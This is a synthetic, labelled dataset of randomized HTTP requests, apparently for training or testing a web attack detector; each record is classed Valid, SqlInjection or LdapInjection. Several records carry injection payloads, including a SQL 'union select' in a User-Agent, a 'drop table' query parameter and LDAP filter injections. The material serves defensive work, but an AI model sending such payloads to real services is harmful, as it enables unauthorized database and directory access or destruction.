Transfer-Encoding: lsp9l
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45229
Start - Id: 11560
class: Valid
GET /sOdFSJG.gif?Fteoi=eR_dvxFk&srn935D8arnu=ttbgsound-%3F&4Ceer6ehoEaih8e=1&teraWe=8&estanaEnwh=s&ndt=metaxt&rde5nroc=uahxatubrwfekn&rmssoadi6s=eu+lIa-onetcatueu3ne&ddeoaeuiTne=rls%3Beson+eer&5t=8965466977&ra9erEiflinr=99&iaantIxiohtryei=ykMmTiawherelBt3nAaa&0otbdol3httl=651581&mhrtncrr5sest4=slbuwsl%286ar HTTP/1.0
Host: www.euhlarhhs.de
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=73
Client-ip: 252.179.56.242
Cookie: ZLO5F=812509;2ndntlery4m=yallmhAhecsr+l
Cookie2: $Version="6"
Date: Fri, 23 Jan 09 06:22:07 CET
ETag: "6kKejnXPOeRQZgBYU6o"
Expect: i8lao=uUso;tnogrho=e0amF
From: brof7eef@knveh.biz
If-Modified-Since: Sat, 22 Oct 05 09:29:42 UTC
If-Unmodified-Since: Wed, 26 Oct 05 13:07:29 CET
If-Match: "b5Cv-yDSVhLpebxUe"
If-None-Match: "LVWFMdsD9s1gCKlu"
If-Range: *
Max-Forwards: 81
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: ii02td ennipIn=ti0tatr
Authorization: Basic dExiRW9pNkE6N3VOb2hm
Range: 557-,-2090,-403052
Referer: http://iajis.de/oOens/kejp/t4mui.zip
TE: trailers,deflate,trailers
Trailer: Upgrade
User-Agent: UrnA6ansaicjuIogztrp
UA-CPU: 68000
UA-Disp: 714,2257,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 827x168
Via: HTTP/8.1 www.iamb.htm
Transfer-Encoding: deflate
Upgrade: coz/2.2, taglnO/9.0, cttDo/4.2, taie/2.4
Warning: 655 24.129.249.203 "tyroj4er3ouraNtrCo" 
X-Forwarded-For: 175.39.106.169
X-Serial-Number: 24189
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11560
Start - Id: 31397
class: Valid
GET /kPy0ZEc._bW62pVM/ole7t8alaM1djlneSgb.mspx?ehise=abthscriptypositionh%271%24&nu8R=+%255r&Ie7wsnr9tne=0&tiztejeatk=i8ric%3A HTTP/1.1
Host: www.iheUoTHj9p.st
Connection: close
Accept: audio/x-wav, text/*, audio/*
Accept-Charset: windows-874;q=0.3, euc-kr
Accept-Encoding: gzip;q=0.6, gzip;q=0.2
Accept-Language: *;q=0.0
Cache-Control: min-fresh=944
Client-ip: 94.233.71.72
Cookie: t-TLVTDtUV=swhereh lnb\</node~wLo&s4m;ofe=35st9
Cookie2: $Version="0"
Date: Mon, 13 Jul 09 07:10:37 GMT
ETag: "C_n4EcdpE8pvRL8F.r"
Expect: ksz0tj=gye9t
From: Tzeuatea@eoges.de
If-Modified-Since: Tue, 17 Oct 06 17:43:52 UTC
If-Unmodified-Since: Sat, 25 Feb 06 03:11:15 GMT
If-Match: "os1C6.ntC5llh_JzVKMj"
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: Basic aG82aGxmUDo2aXRuZTI=
Range: -6182,52054-760058,9-
Referer: /atsomd.gif
TE: trailers,gzip;q=0.1,deflate;q=0.4
Trailer: TE
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 0.0; qo-oe; rv:4.0.3) Gecko/05926335
UA-CPU: StrongARM
UA-Disp: 6015,3763,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2355x254
Via: 0.0 www.Minr.htm
Transfer-Encoding: deflate
Upgrade: eiKz/4.5, tfe/0.1, nnhn/4.9, fptn/7.8, iuaOf/8.9
Warning: 388 www.tfrat7d.jpeg:096 "hrsa7mrlleyurua" "Tue, 09 Mar 10 03:42:13 CET"
X-Forwarded-For: 160.213.53.125
X-Serial-Number: 886445544
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 31397
Start - Id: 42722
class: SqlInjection
POST /tWf/A7nadminAOJHEr8/ITh33fTelYcx/vAWk4_1XpUohPGaLjSzM/w9C3/oU/tTrls.php4? HTTP/1.0
Content-Length: 192
Content-Language: sf0tts,hi
Content-Encoding: gzip
Content-Location: /dtg2ush0/dadrf6np/NfRboa/NrEne.avi
Content-MD5: VDZoZW5PeW10Y3VuU3dvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Apr 08 05:40:55 GMT
Last-Modified: Sat, 11 Sep 04 21:41:22 CET
Host: www.mBotn.st
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2;q=0.7, gb2312;q=0.3, euc-cn;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 177.85.38.60
Cookie: ctejdREHuaqy=oo|(window.openapiframealogen9uHrl
Cookie2: $Version="5"
Date: Sat, 20 Mar 04 02:16:33 GMT
ETag: "CO6efCdL@zR26C6Ui"
Expect: essolao=hhhzot8;I7ehiiC7=oXre
From: rwrhot@o8Obe7p.gov
If-Modified-Since: Wed, 12 Sep 07 18:04:15 GMT
If-Unmodified-Since: Wed, 22 Jul 09 05:33:57 GMT
If-Match: "Pg0Y4oaloLLsxUsFCYp"
If-None-Match: *
If-Range: Sun, 03 Dec 06 12:19:29 GMT
Max-Forwards: 1596
MIME-Version: 5.9
Pragma: tNva='rssr'
Authorization: Basic aGl0SWVvOm9FZ2NmaTBz
Range: 8234-,0500-05,1-
Referer: http://thae.cz/cmae/cayikre/5unI.asmx
TE: trailers,trailers
Trailer: Host
User-Agent: '     union  select    sum(sic)   from   celg--
UA-CPU: StrongARM
UA-Disp: 514,1320,16
UA-Color: color32
UA-Pixels: 3677x3061
Via: tpota/9.6 93.51.157.93, FTP/2.0 133.166.181.86, 1.3 www.tI2wnns.gif
Transfer-Encoding: gzip
Upgrade: voFoet/7.8, oRnfo/8.0
Warning: 048 www.8soqun3o.shtml:67 "3rotytraaa" "Thu, 25 Jun 09 14:12:23 GMT"
X-Serial-Number: 123099568526
----: --------------------------------------

asp=245232&nltneEeo28=lvRntw&tdrsnimt0hIzrta=513359&eeotatdace=8855662&0bm70wmmailscriptuH0=uZ5X5Rm&ieKhjtziOFj=27&oie=$aa&MHleWasystemkgstdin=962357251&fylsotio=1rttsamtva4&ni= t)ionxrgbm

End - Id: 42722
Start - Id: 15939
class: Valid
GET /idbci0ia/liketmp.php3? HTTP/1.0
Host: www.i70ce.ch
Connection: scviolk3
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic;q=0.1, gb2312
Accept-Encoding: compress
Accept-Language: aeanh-2Ai1h, iee-t;q=0.5
Cache-Control: only-if-cached
Client-ip: 80.167.167.42
Cookie: 6hh=snoMPl;ssBR2g=5;41=dei;liswbwdkua4amh=ewhere4wnmochaiiErO;rebd9ltSn=wAe
Cookie2: $Version="589"
Date: Wed, 02 Sep 09 22:21:30 GMT
ETag: "e9Gu-D8xFNqMpSU"
Expect: 100-continue
From: dejt@eiwqestde.org
If-Modified-Since: Tue, 04 Jul 06 19:59:48 GMT
If-Unmodified-Since: Mon, 28 Jan 08 09:13:56 CET
If-Match: *
If-None-Match: "NOGqUpheS5PWTTG24M"
If-Range: Sun, 11 Jan 04 15:35:11 GMT
Max-Forwards: 74
MIME-Version: 0.4
Pragma: StwSTs='emEfnshF'
Proxy-Authorization: Basic OU5Ucmk1OnNzRWxh
Authorization: Digest opaque="Ns8fivs"
Range: -08,0744-,-43437
Referer: http://www.r9JTrc.uk/eepg/Sin73/iereLhdE.gz
TE: chunked;q=0.0,chunked;q=0.6
Trailer: Trailer
User-Agent: Mozilla/9.9 (compatible; MSIE 1.5; Solaris; iatSlmw; 6yrbu7x)
UA-CPU: Sparc
UA-Disp: 9960,6267,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 7490x6757
Via: eieT/0.4 165.123.185.189:4943, HTTP/0.0 www.tnht.shtml:1, 4.3 87.177.15.193
Transfer-Encoding: compress
Upgrade: nbf6oi/8.6, oqeh/3.0
Warning: 043 43.221.213.2 "aosrvsdSerhlegrta" 
X-Forwarded-For: 249.146.24.22
X-Serial-Number: 902795825
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15939
Start - Id: 6612
class: Valid
POST /EltiFrLc/rzWa8ZJa8R_3xF.F.jsp? HTTP/1.1
Content-Length: 25
Content-Language: nwc,dtlmxst,cbAya
Content-Encoding: gzip
Content-Location: /Dtapw.gz
Content-MD5: aWVndG4xbmphdG1vdG9kbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Nov 08 04:02:05 GMT
Last-Modified: Sat, 15 Oct 05 20:02:30 UTC
Host: 189.247.231.49
Connection: lgce
Accept: */*;q=0.2
Accept-Charset: iso-8859-8-i;q=0.9, iso-2022-jp;q=0.7
Accept-Encoding: deflate;q=0.5, compress, deflate, identity;q=0.0
Accept-Language: nrnde-m8y;q=0.2, TeLTw-lml, 5m-haht, Ssue7hsm-t1mo
Cache-Control: min-fresh=0262
Client-ip: 76.48.3.104
Cookie: Ar1seervnq=hr oe;F4DxxHjn7K= pMt@e eq8 absUv;kL.xmXjHBByY=thee;ykaa=17
Cookie2: $Version="495"
Date: Wed, 10 Jan 07 23:15:10 CET
ETag: W/"@EPAcRqyQ7lDSvSX"
Expect: 100-continue
From: bshjend@msHd1worO.de
If-Modified-Since: Wed, 25 Nov 09 20:29:20 UTC
If-Unmodified-Since: Sun, 22 Mar 09 11:29:15 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 11 Nov 08 11:40:07 CET
Max-Forwards: 8930
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: zmtsI sarl0ue=aryfers
Authorization: hoie 6hybuke=teTdibs
Range: 349575-,-01819
Referer: http://www.rgaoedwt.uk/dlry/4mthios/at2jecg/sD6it7tt/sze7l8n.tar
TE: deflate;q=0.2
Trailer: Warning
User-Agent: gNCpAnu http://www.nj0iheLT.de
UA-CPU: PowerPC
UA-Disp: 3961,730,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2928x871
Via: dZe/6.4 www.pHiodA.css:6, HTTP/7.8 112.76.40.1, FTP/3.1 56.125.18.195
Transfer-Encoding: gzip
Upgrade: fmu/0.4, eel/9.8, ebSrda/0.8, OsurI/5.9, recrv/2.4
Warning: 107 4.57.179.221 "8neA" 
X-Forwarded-For: 101.21.26.57
X-Serial-Number: 43970651738336527001
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xebod=pAt2riAg&sr0nlf8=ea

End - Id: 6612
Start - Id: 14435
class: Valid
GET /ynnvHire/6JZ7@WypeG/nE/a9DCh2qMLM5/4VYOYU4XXcG7wqLL/a@xvwrSmUOx/ysnocleerupCd.htm?MaEarhoda9tyd=cl&0ocniso=5011 HTTP/1.1
Host: 222.45.19.65
Connection: close
Accept: image/*
Accept-Charset: macintosh;q=0.5, gb2312;q=0.8, us-ascii, iso-8859-9
Accept-Encoding: compress;q=0.8, gzip;q=0.5, gzip;q=0.8, gzip, deflate;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 229.170.168.250
Cookie: w5orst=oowuenrwfir
Cookie2: $Version="52"
Date: Tue, 06 Jan 09 22:45:14 CET
ETag: "LP9hdv0ROyxSDSQ0Q"
Expect: hEstei
From: inuozal@th8rsa.cz
If-Modified-Since: Sat, 19 Mar 05 11:33:18 UTC
If-Unmodified-Since: Mon, 24 May 04 12:19:01 UTC
If-Match: "WM47c5IsyN1J2t.E@t"
If-None-Match: *
If-Range: Tue, 21 Jun 05 15:31:47 CET
Max-Forwards: 45
MIME-Version: 1.0
Pragma: w8ba1qa='1rc'
Proxy-Authorization: Basic aHJpVGF0OmR0YXM=
Authorization: Basic bG9hZXVlcjphZW5ybA==
Range: -517,627-,587-701
Referer: /ieyoe/QtC1Iae.gif
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: mjcnQnaihosm
UA-CPU: 68000
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: eE4/5.6 www.lha9W.jpg, FTP/2.5 7.14.237.60, FTP/7.8 45.176.135.87:67403
Transfer-Encoding: OGx3su; dizeoi=6a0ctnta
Upgrade: swrIch/2.0, cnp/1.4, Ms3ey/4.3, Enm/6.8
Warning: 696 www.x5erorr.gif "amRedorfoi9a" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14435
Start - Id: 41637
class: SqlInjection
GET /Jhttp/apefheEdsCcao0/jB/t5pDYG2awK4zldc/gme/ao/cmEwNLP6Qeu8504w2o.php3?qShrinOha=afDegee_N&grwbegg=oNNazeigD2&P2I2cdrhZ=e3anrlmRHte&nunIiIc8oubto=04732379&gweye=4439613&sueaoA=5odi4la&dcieewbot=%27%3B+++++drop++++table+++++ke5turn&ybhg=rcp%3BScf&tHt=odcesfi HTTP/1.0
Host: 243.14.234.216
Connection: keep-alive
Accept: application/*, audio/*;q=0.8, text/*
Accept-Charset: iso-2022-jp, euc-cn;q=0.2, windows-1253;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: 3=eaRnOnah
Client-ip: 250.22.146.196
Cookie: e5rtapon=9710404
Cookie2: $Version="469"
Date: Fri, 10 Oct 08 01:02:28 GMT
ETag: W/"hmTxEJ5FkJRToMJo."
Expect: 100-continue
From: Ngbe0@ieOneutQWl.com
If-Modified-Since: Mon, 14 Dec 09 06:24:53 UTC
If-Unmodified-Since: Fri, 18 Nov 05 09:51:58 CET
If-Match: "YfyF@F3US0_N7MgD5oI"
If-None-Match: "@@0ePc4vYQG8BPHB"
If-Range: Sun, 04 Sep 05 20:15:18 UTC
Max-Forwards: 0
MIME-Version: 5.2
Pragma: n3husvoA='rp'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM M2FlaG93aWx5Y2Vqbm90dGVlaWNlbndhcHBvaXZzdVJhc2NmYnlhYQ==
Range: -11289
Referer: /atfleela.css
TE: deflate
Trailer: Upgrade
User-Agent: hmJzI4 http://www.HFbfOna.ch
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: 3.7 www.eIetb.html, FTP/7.9 www.vdnM.tiff, HTTP/7.1 25.4.86.192
Transfer-Encoding: deflate
Upgrade: hzse/6.1
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41637
Start - Id: 3938
class: Valid
PUT /gmBb360-4P/3gipwsbe3jeb5iiRE/Ya2uYzmetaincludeFallIprocessing-instruction/herw47o2taoa/l7n@i8ZJhF/R8sjsavrcn.js? HTTP/1.1
Content-Length: 118
Content-Language: nl01eh
Content-Encoding: deflate
Content-Location: http://www.aRicq.it/o8Seieoo/takdTsmt.exe
Content-MD5: Z0l0eXJlZmVhYTd0ZGVybg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Feb 08 20:37:03 CET
Last-Modified: Wed, 27 Oct 04 23:14:47 CET
Host: 132.182.249.208:164
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 130.216.226.250
Cookie: wdptIdgaa=725598
Cookie2: $Version="070"
Date: Mon, 09 Mar 09 01:45:10 GMT
ETag: W/"Fw9MaeZH.fthazQOfrU"
Expect: 100-continue
From: piNm@lsgw.org
If-Modified-Since: Sun, 02 Dec 07 17:54:47 UTC
If-Unmodified-Since: Fri, 03 Nov 06 12:04:11 GMT
If-Match: *
If-None-Match: *
If-Range: "8S-bwi177JJ_OQXqdv"
Max-Forwards: 52
MIME-Version: 4.9
Pragma: isez=k
Proxy-Authorization: Basic cmlzaGhoaTo1ZWt3d2VhZA==
Authorization: ipmo nhmte=tOa76en
Range: -9,-7,885-
Referer: /h8saR/tewoq/orio.swf
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: uNpaarezicisxybeeds2
UA-CPU: Sparc
UA-Disp: 905,734,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8863x893
Via: 2.5 www.Rtdav.html, FTP/0.7 www.g5emo.js, 2.4 www.wuMndoo.tiff:8
Transfer-Encoding: iari
Upgrade: nake/5.5
Warning: 755 159.17.164.26 "Zuie" "Wed, 21 Oct 09 17:55:16 UTC"
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 43070920922344892051
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n@Vyaccess_log=80&yc33htaccesXl=oeiuj&t649OiitAFmr=+nod3\7+:nrmacc0&mkg9w=ox&oss0sua=629219&snwm=tfagrf&eik=dt

End - Id: 3938
Start - Id: 27324
class: Valid
GET /4W0HtLMk-eg/ba8w16SvGzYf1bvVvse/ft5tsy4f4/pbuaHqul3s/eT_4wyA/Bb/dva_pdocumentY.fX1EL..msf?nyge=s3Qc2VnuZ-&qgtannnem=e24b&pvOFX=fjkL&un=749&e0berqX=%7Ct%261s&rnlt=etIa4opsc&hAocso3=oyrtnEfe&nNhmhesowcrVim=2735&gsiwqnn5=6&arerMejcsm=sSscaa HTTP/1.0
Host: www.esTid2i.de
Connection: ytw3oe
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 47.126.124.55
Cookie: ri9mz89tfeulvt=eia1u3m;qreEte=ovete;Ionff=neefUlInv9stnyiKae;vogauhptnw=<qd;yceuf=035337;twcaaesUhigen=r=t
Cookie2: $Version="7"
Date: Tue, 07 Dec 04 07:07:57 CET
ETag: W/"@QdiiYUnF9uBxKPJ"
Expect: 100-continue
From: vwlot@te9enkmla.fr
If-Modified-Since: Thu, 21 Oct 04 03:22:05 GMT
If-Unmodified-Since: Wed, 03 Mar 10 07:21:27 UTC
If-Match: "6oLNb5vQc882yZUB"
If-None-Match: "l-qDq5SkbrE0qSfz4_d"
If-Range: "I5-MGzRqkH86ZCz"
Max-Forwards: 6952
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM ckVlaDJuRU5hZWhqb3RkMWVrdW5uZTlvc2h1cHRyYW9k
Authorization: tmhbeh 3St6=sinI
Range: -49505
Referer: http://bfau4e.cz/ir6oa/6rofadi/ehtIii6/suGeDisn/nuanslr.pdf
TE: gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 5.1; nn-Lr; rv:8.6.5) Gecko/08979754
UA-CPU: x86
UA-Disp: 3109,349,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3599x969
Via: uamhk/9.4 182.0.104.248, 9.4 www.8roS.html:56119, HTTP/0.6 www.oemtaeo.gif:81099
Transfer-Encoding: gzip
Upgrade: hosi/6.4, mbe/1.4, ewo/1.2, e7974/0.6
Warning: 310 www.wIblei.png "anibiOgti2Un" "Sun, 21 Feb 10 08:44:37 CET"
X-Forwarded-For: 93.54.79.26
X-Serial-Number: 99615814182881268
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27324
Start - Id: 21154
class: Valid
GET /oautHibhaetaann/al/ieaiieloroglo/o.Nzif5VhC-cMzpS.Bx..cgi?nthwtx=adamdudetau&snci7e=d%5Dwn%24ndoaei%26w%3Eiedreplaceelog&1YIZBA4RQ=d8sam&evalinsertlog6TNK6Z=isho&r7=5110 HTTP/1.0
Host: www.erksptolmr.biz:90705
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.7, gzip, identity;q=0.8
Accept-Language: nhinr-xta;q=0.4
Cache-Control: max-age=16
Client-ip: 41.203.59.69
Cookie: dsis0=100988;hehgot=$tria
Cookie2: $Version="2"
Date: Sun, 02 May 04 14:14:36 UTC
ETag: W/"uL2g6QkPb09Ijy3yR"
Expect: rsihxz=nuu7
From: dhehtais@ahehpggov.uk
If-Modified-Since: Sat, 24 Jun 06 03:53:20 GMT
If-Unmodified-Since: Sun, 10 Oct 04 19:02:48 UTC
If-Match: *
If-None-Match: "oSJkeUAak@wbpx9o2E"
If-Range: Fri, 14 Jan 05 15:00:09 UTC
Max-Forwards: 70
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: spnetr snSiU=Eaaulsc
Authorization: Digest algorithm=Gcso
Range: 1175-,-288
Referer: http://aeaaa.biz/iakr.gz
TE: deflate;q=0.4,trailers,trailers
Trailer: Connection
User-Agent: etwNfhr/7.4.9.9
UA-CPU: Sparc
UA-Disp: 1305,9206,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 739x758
Via: 5.2 61.134.218.131
Transfer-Encoding: eiRo
Upgrade: iotyCf/8.9, 2dsd6e/9.2
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 204.128.223.43
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21154
Start - Id: 20731
class: Valid
GET /h7wC-xOf2k/illHwsgdgho/bixmeDWcW/lE/rneggwsle83i8jC/efttb8tierlirxcyxFl/acceptn8Nbgsound/n6aX2k3.js? HTTP/1.1
Host: www.e2po.org
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ylrtr-fo9eer
Cache-Control: no-transform
Client-ip: 173.194.244.159
Cookie: Godr=36691777;fsY=(ibE
Cookie2: $Version="9"
Date: Wed, 30 Mar 05 23:57:15 CET
ETag: "1DgOo2vdxETCOqChv"
Expect: 100-continue
From: edarepsn@mOihgon.org
If-Modified-Since: Fri, 08 Apr 05 02:05:32 UTC
If-Unmodified-Since: Sat, 02 Apr 05 05:44:10 GMT
If-Match: *
If-None-Match: "j156U3rZ_HZRl0hx-"
If-Range: Sat, 29 Mar 08 24:27:26 GMT
Max-Forwards: 0
MIME-Version: 1.8
Pragma: p=eOu9o3u
Proxy-Authorization: Digest nc=ce10aCbC
Authorization: ea8xUs iNetes=ubtcv
Range: -497842,992988-5164
Referer: /txhcbt/iii5yD.wmn
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: e0Oh5o (iSx3zI)
UA-CPU: MIPS
UA-Disp: 8501,806,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: 0.7 144.31.190.113, 3.1 232.168.112.139
Transfer-Encoding: deflate
Upgrade: ciuSw/6.9, Weep/3.5, 1twnnO/9.3
Warning: 447 156.37.10.161 "oa0itiorbaoej2" 
X-Forwarded-For: 255.159.77.194
X-Serial-Number: 43053635016402500046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20731
Start - Id: 13465
class: Valid
GET /cttae7ais/nPp0voVow@U/KUApluyt0AB/3soIipiEDthru/TiD6oR7twnciU7locationf/gv4ot/tU.VRkBhUC13/nMFGri6x34.php?0yfprocessing-instructionHMm=nnmRqIuvhsraeee&cf=dAkR9KO&6ReiQhk@=eS01p%40zFdF7&soage6gNffiR4O=r%3Dshutdown&yAesmSf=28&gsmieelGclNnppu=8072790&Ueremaoli=+ok%27ipyeare-%5Boh8er&woantP3tteerin=4&olRnaeo=ta9Fq4V1w0e6&9TbodyVDlN=le&ietiohaikea=9ftr&ztodss5atRktejr=r%25telnet8d%3CO+Qkbieeq%24node HTTP/1.0
Host: www.ng6er.st:791
Connection: close
Accept: */*;q=0.9
Accept-Charset: euc-cn, euc-cn;q=0.0, windows-1252;q=0.7, cp-936, iso-8859-7
Accept-Encoding: *
Accept-Language: pteeemda-rhlnnbs
Cache-Control: no-cache
Client-ip: 35.217.124.230
Cookie: hzhe=220497;nohneapw9inni=g_MSghuj8-R
Cookie2: $Version="727"
Date: Tue, 22 Feb 05 21:08:27 GMT
ETag: W/"9cClyJiotc2LukdJQ6R"
Expect: 100-continue
From: ahyni5@nu8Ltehais.it
If-Modified-Since: Sat, 12 Mar 05 21:40:03 CET
If-Unmodified-Since: Tue, 29 Aug 06 22:45:58 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 401
MIME-Version: 2.1
Pragma: tsay4='v'
Proxy-Authorization: Digest nonce
Authorization: Basic RmN5UDpkdWc5aU9IeQ==
Range: -258637,-88,5-
Referer: http://rybf.uk/8Upama/iemDpn/t9etbrei/shht.jpg
TE: trailers,chunked;q=0.8
Trailer: Accept-Encoding
User-Agent: wneoea
UA-CPU: x86
UA-Disp: 710,2643,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 188x166
Via: 0.1 173.32.74.59
Transfer-Encoding: identity
Upgrade: snoo/8.6, ikrhga/7.1, Sl9hli/2.0, ert8/9.2, vwtli/1.0
Warning: 540 www.tequrah.html "6nhY" 
X-Forwarded-For: 37.38.29.200
X-Serial-Number: 648318819511788387
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13465
Start - Id: 37076
class: LdapInjection
GET /rrW7@UnGrVsiP/4s3Ea8/8v/ulfdqHqpiq-pB-XtpYFy/ydbH2ufl-R4bp4Yg0b/euntephqwonbtnt6t/pf4ALVw8Hgf/cqahC-4XhzHZghKf/olt/kWNDHg.htm?liyTZnspaizFs=288645&tblmerwq8rltlgt=3557&g5K_homegM=bhmZ7-.-&Vg3wlocationn=nhhsa%29%28%26%28objectClass+++%3D+++tisn*%29&1lBGJnE7B2=5oUhts&eonw=730&hnaitDnesWPt=allh+&9vtmrerl=atbxanautoexecgi0 HTTP/1.1
Host: 149.18.208.7
Connection: close
Accept: */*;q=0.5
Accept-Charset: utf-7, big5;q=0.3, utf-8;q=0.4, big5, euc-tw;q=0.6
Accept-Encoding: gzip;q=0.2, deflate;q=0.0, identity, gzip
Accept-Language: *
Cache-Control: rtO62an1=rthEoae
Client-ip: 172.225.76.42
Cookie: oaaoGo3a=enFsfxa;ed8pi=79;geNlrolut=630000523;lauee=$hdrmlqnph-6;cenodeurll7etjR=h4deletedrcphhsemewdo%4lc;0niis30ae9OhtLn=0195800899
Cookie2: $Version="5"
Date: Wed, 27 Sep 06 19:00:25 UTC
ETag: W/".eEQ4Wr5D0sN1fBRU"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Sat, 27 Oct 07 04:44:57 GMT
If-Unmodified-Since: Fri, 02 Mar 07 12:44:31 CET
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Sun, 20 Jul 08 06:55:29 CET
Max-Forwards: 6939
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest response="CB0ac9d59ddCF835AdcB7a4b7B71f8fC"
Authorization: oWre 2aoifSd=An8Eehts
Range: -5
Referer: /eemepDGt/9savtuob/yumAsilt/usds.mdb
TE: deflate,trailers,gzip;q=0.0
Trailer: From
User-Agent: Mozilla/0.2 (Windows; U; Win98 7.2; mi-ss; rv:2.3.4) Gecko/80029813
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7857x018
Via: snrtf/1.5 www.n6223kte.png
Transfer-Encoding: compress
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 233 127.78.233.52 "baru8" "Tue, 09 Mar 04 09:31:50 CET"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 252851
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37076
Start - Id: 38646
class: LdapInjection
GET /kthsiwndainglMeeen/esrjptiaf/toEcijYRhnCQ0Ib/oeTsHex/iAT/iY5nM2lnttVyhu/dDXZC5HA9AaY1Jx1n8/tNhauTeildhtsn5i/sJqo8etcoDWDEHl4.msf?nacmpN=727137&al=%29+%28+++%7C++++%28displayName%3Dhad*%29+%28name+%3Dhad*+++%29%28+++mail%3Dhad*++++%29 HTTP/1.1
Host: www.ecShbo.fr:6
Connection: en2tt
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, deflate, deflate;q=0.9
Accept-Language: eh-er, ew6ce5-ru41ide, sbA5n-res9h;q=0.0, tpn1IS-l;q=0.6
Cache-Control: no-transform
Client-ip: 48.249.181.128
Cookie: enu=au;ee=333;2VL8.y=395184;embeL=esdw/;jpwai=4728
Cookie2: $Version="43"
Date: Sun, 07 Dec 08 02:59:16 UTC
ETag: "9WmL6Zj2qJvQQYwY"
Expect: 100-continue
From: Ta0d@ltoseerIl.gov
If-Modified-Since: Wed, 14 Nov 07 04:24:46 UTC
